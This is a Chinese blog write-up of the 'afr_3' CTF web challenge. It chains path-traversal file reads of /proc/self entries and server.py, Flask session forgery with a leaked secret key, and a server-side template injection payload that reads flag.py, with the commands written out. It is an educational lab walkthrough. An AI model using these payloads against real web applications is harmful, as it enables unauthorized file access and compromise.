[第一章 web入门]afr_3

于 2024-04-04 17:39:17 发布
阅读量801 收藏 8
点赞数 15
文章标签: 笔记 ctf 题解 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/137378641
版权

[第一章 web入门]afr_3

任意文件读取,session伪造+ssti

  • 先随便输入,进入页面之后,让我们看文章,尝试使用./,测试是否为一个文件
    image.png
  • 测试成功,是一个文件,所以尝试文件读取漏洞
    image.png
  • 直接读取flag发现不行
    image.png

/proc/self/

[[proc-self]]

/proc/self/cmdline 包含了用于开始进程的命令
/proc/self/cwd 包含了当前进程工作目录的一个链接
/proc/self/environ 包含了可用进程环境变量的列表
/proc/self/exe 包含了正在进程中运行的程序链接
/proc/self/fd/ 这个目录包含了进程打开的每一个文件的链接
/proc/self/mem 包含了进程在内存中的内容
/proc/self/stat 包含了进程的状态信息
/proc/self/statm 包含了进程的内存使用信息
/proc/self/pwd/ 代表的是当前路径

  • 尝试读取/proc/self/cmdline得到
    image.png
  • 尝试读取/proc/self/cwd/server.py
    image.png

import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')
execfile('key.py')

FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    if page.find('flag')>=0:
        page = 'notallowed.txt'
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e

    return render_template('article.html', template=template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)
  • 可以发现secret_key在key.py,flag在flag.py里面
  • 并且,/n1page路由下面有ssti注入,注入的数据刚好是session
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']

flask-session-cookie-manager

[[flask-session-cookie-manager]]

解码得到格式
python3 flask_session_cookie_manager3.py decode -c "eyJuMWNvZGUiOm51bGx9.Zg5nDw.Gujas8JJVC9HCDxcyUMfSKL0Sn0" -s "Drmhze6EPcv0fN_81Bj-nA"

格式
{'n1code': None}

根据格式加密
python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__base__.__subclasses__()[40](\'flag.py\').read()}}'}" -s "Drmhze6EPcv0fN_81Bj-nA"

得到
eyJuMWNvZGUiOiJ7e1tdLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgnZmxhZy5weScpLnJlYWQoKX19In0.Zg5tbQ.xMI3iaQ8sQIszfzcgF6I-G8Qa9g

其中的ssti语句,读取flag.py内容

{{[].__class__.__base__.__subclasses__()[40]('flag.py').read()}}
  • 将伪造的session放入/n1page路由下面
    image.png
尘佑不尘
关注
  • 15
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
《从0到1:CTFer成长之路》配套题目第一章afr_3
Youth____的博客
12-14 2280
afr_3 这题跟着wp做的,让人头秃 本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 /proc/[pid],当查看当前进程的时候可以用/pro
N1Book-第一章Web入门-任意文件读取漏洞-afr_3
weixin_40872714的博客
04-03 1220
N1Book-第一章Web入门-任意文件读取漏洞-afr_3 参考文章: https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787 http://elssm.top/2021/11/29/SSTI%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/ https://www.freebuf.com/articles/web/264088.html
NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp
居上
06-29 462
afr_3 考查内容:对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到 查看源代码,中间有个空格的 python server.py 请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码 @app.route("/n1
ctfhub -afr -1 2 3
m0_57954651的博客
11-18 1164
补充(Linux系统上的/proc目录是一种文件系统 即proc文件系统 与其它常见的文件系统不同的是 /proc是一种伪文件系统(也即虚拟文件系统) 存储的是当前内核运行状态的一系列特殊文件 用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息 甚至可以通过更改其中某些文件来改变内核的运行状态。发现flag在flag.py flask的appkey在key.py 但是此处任意文件读取漏洞被过滤了关键词flag。p=flag 回显了 no no no。默认的传参数据为?
CTFSHOW系列-web3(信息收集-抓包看响应头)
siu~
11-22 478
CTFSHOW系列解题思路
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,提供了人脸识别的库,它的名字叫face_recongnition.dll,我们找到它的SDK文档。 来建立各个结构体和API的C#映射...这个结构体是FD识别的输出结构体,我们在上一章节标记人脸时使用了此结构体。
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
HA_AFR20_gnatix
03-04
快速查找工具HA_AFR20_gnatix
AFR for asymmetric fixture.pdf
06-18
S参数切割工具,AFR小工具算法分析以及针对非对称S参数的计算推导
AFR自动夹具移除校准方法的原理
08-28
AFR(Automatic Fixture Removal,自动夹具移除)校准方法是电子测量领域中用于精确测量电路或设备(DUT,Device Under Test)性能的一种关键技术。这种方法主要用于补偿测试夹具,如PCB或其他连接器,引入的信号...
c+cgi+mysql+ajax实现web操作mysql
08-29
完成CGI - MYSQL作业: 实现一个MySQL Web 客户端。 通过浏览器操作MySQL。 页面整体布局如下: MySQL Host: (单行输入框) MySQL Port: (单行输入框) MySQL User: (单行输入框) MySQL Pass: (单行输入框) MySQL DB: (单行输入框) SQL 语句: (单行输入框) 总行数: XXXXX 表格显示SQL 结果。 要求: 输入对应的MYSQL SERVER 信息, 然后回显用户执行的 SQL 语句结果。 结果信息应包含: 总行数、 字段名,以及具体的字段内容。要求使用 AJAX,在不刷新整个页面的情况下,展示结果数据。 如果SQL语句执行出错,应给出具体的出错原因。 密码应用星号显示而非明文显示。
《从0到1:CTFer成长之路》afr_3
ZhShy
01-16 1084
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
CTFHub-Web-信息泄露
1stPeak's Blog
07-27 406
文章目录目录遍历PHPINFO网站源码bak文件vim缓存.DS_StoreGit泄露-Log(环境有问题)Git泄露-Stash(环境有问题)Git泄露-IndexSVN泄露HG泄露 目录遍历 解题方法 第一种:一个一个点 第二种:python脚本 import requests url = "URL" for i in range(1,5): for j in range(1,5): req = url + "/" + str(i) + "/" + str(j)
CTFHUB Web题解记录(信息泄露、弱口令部分)
豆傻小饼干随记
03-18 6904
以下内容只是自己做题的一个记录,不喜勿喷 一、信息泄露 1、目录遍历 这里通过观察目录的情况,发现目录都是 /flag_in_here/1/%d 的样式,于是构造脚本 #!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- import urllib.request import urllib.re...
SSTI模板注入
weixin_42739903的博客
01-10 1427
SSTI 漏洞介绍和一些题目案例演示
BUUCTF N1BOOK [第一章 web入门]
Sk1y的博客
03-26 3597
sql盲注脚本 目录穿越 session伪造 源码泄露
第一章 web入门]afr_1 1】任意文件读取
最新发布
carrot11223的博客
01-25 742
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
[第一章 web入门]afr_31
evil_ming的博客
05-07 599
这个flag设置的真是防君子不防小人啊,因为刚做完2的看见2的flag很有灵性n1book{afr_2_solved} 把2改成3提交就直接成功了,感觉比赛的时候不会这么好运那还是写一下吧。 打开靶机 习惯先提交个admin 点击article 通过url里发现的name参数来获取系统命令 name=../../../../../proc/self/cmdline 上网查了下 name=../../../../../proc/self/cwd/server.p...
【N1BOOK】[第一章 web入门] wp
{OvEr}的博客
11-25 4153
【N1BOOK】[第一章 web入门]常见的搜集 wp 打开页面就是这样的 我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp 扫目录工具dirsearch/御剑,这里我用的是dirsearch。 我们一个个访问一下, 他说flag在/flag1_is_her3_fun.txt,那我们就访问一下 得到第一半flag,继续访问 index.php~ 得到第2半flag,继续访问 .index.php.swp,打开文件 发现第3半flag ..
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值